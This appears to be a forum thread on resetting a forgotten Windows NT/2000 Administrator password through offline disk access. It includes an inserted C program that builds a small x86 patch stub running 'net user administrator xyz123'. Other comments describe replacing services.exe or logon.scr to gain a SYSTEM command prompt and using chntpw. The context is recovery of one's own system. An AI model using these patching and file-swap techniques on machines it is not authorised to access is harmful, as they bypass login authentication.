"My understanding of this procedure is that I would mount the hard drive on another computer and match the Administrator password hash to a known password"
For future reference, all you need to do is temporarily replace services.exe with an exe that runs "net user administrator xyz123" (to change the password to xyz123), then reboot. Then put the original services.exe back, of course.
Not really. This is pre-ASLR, so all you need to do is push a string pointer on the stack and call an address. Probably less than 15 bytes of machine code you'd need to hex-edit into an existing exe.
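To put a number on the "less than 15 bytes" claim, here is an added example (not code from the thread) that encodes the stub on 32-bit x86: `push imm32` (5 bytes) followed by `call dword ptr [imm32]` (6 bytes), 11 bytes in all, with the NUL-terminated command string laid out just in front of it. The base address, the IAT slot address and the assumption that the target exe already imports a cdecl single-argument function such as `system()` are all placeholders; a real patch would take them from the binary's section table and import directory.

```c
/* Added example, not from the thread: byte layout of a "push string
 * pointer, call through an import" stub on 32-bit x86, pre-ASLR. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Little-endian 32-bit store and load, as x86 immediates are encoded. */
static void wr32(uint8_t *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Encode "push imm32 ; call dword ptr [imm32]" into out (11 bytes).
 * str_va      - virtual address of the NUL-terminated command string
 * iat_slot_va - address of an IAT slot holding a cdecl function that takes
 *               one char* (assumed, e.g. msvcrt!system); because the call
 *               goes through the import slot, no code address is needed */
static size_t encode_push_call(uint32_t str_va, uint32_t iat_slot_va, uint8_t *out) {
    out[0] = 0x68;                         /* push imm32            */
    wr32(out + 1, str_va);
    out[5] = 0xFF; out[6] = 0x15;          /* call dword ptr [imm32] */
    wr32(out + 7, iat_slot_va);
    return 11;
}

/* Lay out [cmd\0][stub] at base_va (placeholder: some slack space in an
 * existing section). Returns the total patch size, or 0 if it won't fit. */
static size_t build_patch(uint32_t base_va, const char *cmd, uint32_t iat_slot_va,
                          uint8_t *buf, size_t cap) {
    size_t slen = strlen(cmd) + 1;
    if (slen + 11 > cap) return 0;
    memcpy(buf, cmd, slen);                /* string first, stub after it  */
    return slen + encode_push_call(base_va, iat_slot_va, buf + slen);
}

/* Decode a patch built by build_patch and confirm the push operand points
 * at the string and the call reads the expected IAT slot. */
static int patch_consistent(const uint8_t *buf, size_t total, uint32_t base_va,
                            uint32_t iat_slot_va) {
    size_t slen = strlen((const char *)buf) + 1;
    const uint8_t *stub = buf + slen;
    return total == slen + 11 && stub[0] == 0x68 && rd32(stub + 1) == base_va &&
           stub[5] == 0xFF && stub[6] == 0x15 && rd32(stub + 7) == iat_slot_va;
}

int main(void) {
    /* Placeholder addresses; these are NOT real offsets from any binary. */
    const uint32_t base_va = 0x00405000u, iat_slot_va = 0x00402018u;
    uint8_t buf[64];
    size_t n = build_patch(base_va, "net user administrator xyz123", iat_slot_va,
                           buf, sizeof buf);
    printf("patch is %zu bytes (string %zu + stub 11):\n", n, n - 11);
    for (size_t i = 0; i < n; i++) printf("%02x%c", buf[i], (i % 16 == 15) ? '\n' : ' ');
    printf("\nconsistent: %d\n", patch_consistent(buf, n, base_va, iat_slot_va));
    return 0;
}
```

Two caveats the one-liner above glosses over: the stub as written neither pops its argument nor jumps back, so to keep the patched exe working you would add `add esp, 4` (3 bytes) and a `jmp` to the original code (5 bytes), which is still tiny; and the string pointer is an absolute address, which is exactly why this only works on a pre-ASLR system, as the commenter says.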
If you have hard drive access you can replace the logon.scr screensaver executable with the command prompt executable, then a few minutes after boot up a command prompt with system privileges will appear by magic.
I believe the format of either the registry hives or the way the password hash is stored changed between Win2K and WinXP, so a modern tool likely wouldn't work. That's why you can use a Windows 2000 CD to boot to a recovery console in later Windows versions without a password: it thinks the registry is corrupt and skips authentication.
chntpw works on all versions from NT 3.1 through Windows 10. Neither the hive format nor the password storage format has actually changed in all that time. :-)
Mind, the trickiest part of dealing with pre-4.0 is mounting the file system, assuming the OS was placed onto NTFS rather than FAT. ntfs-3g only likes the "modern" NTFS format, which is found in NT 4.0 and up.
A couple of times I've tried mounting an NT 3.51 disk in a modern Windows 7 system, and while it works (you can read from and write to it fine), once you even mount it, NT 3.51 will never boot from that disk again. It hangs during the blue NTLDR stage.
I'm not sure what would ever possess anyone to think it a good idea to write to a filesystem immediately upon mounting it, but Windows 7 does something to old NTFS volumes which renders them incompatible with NT 3.x.
Most probably the filesystem is updated (silently), as happened historically.
In the good ol' times there were free demo CDs of Windows 2000 (90 or 120 days trial); everyone (that was running NT 4.0) tried them.
Those with NT 4.0 already up to SP 4 had no issues (but chkdsk stopped working); all the ones with earlier service packs had an unbootable machine (if NT 4.00 was on NTFS).
At the time there were a couple of "workarounds" for the CHKDSK issue, one by Sysinternals/Mark Russinovich, NTFSCHK, and one, Mark4NTFS, by M. Tartsch.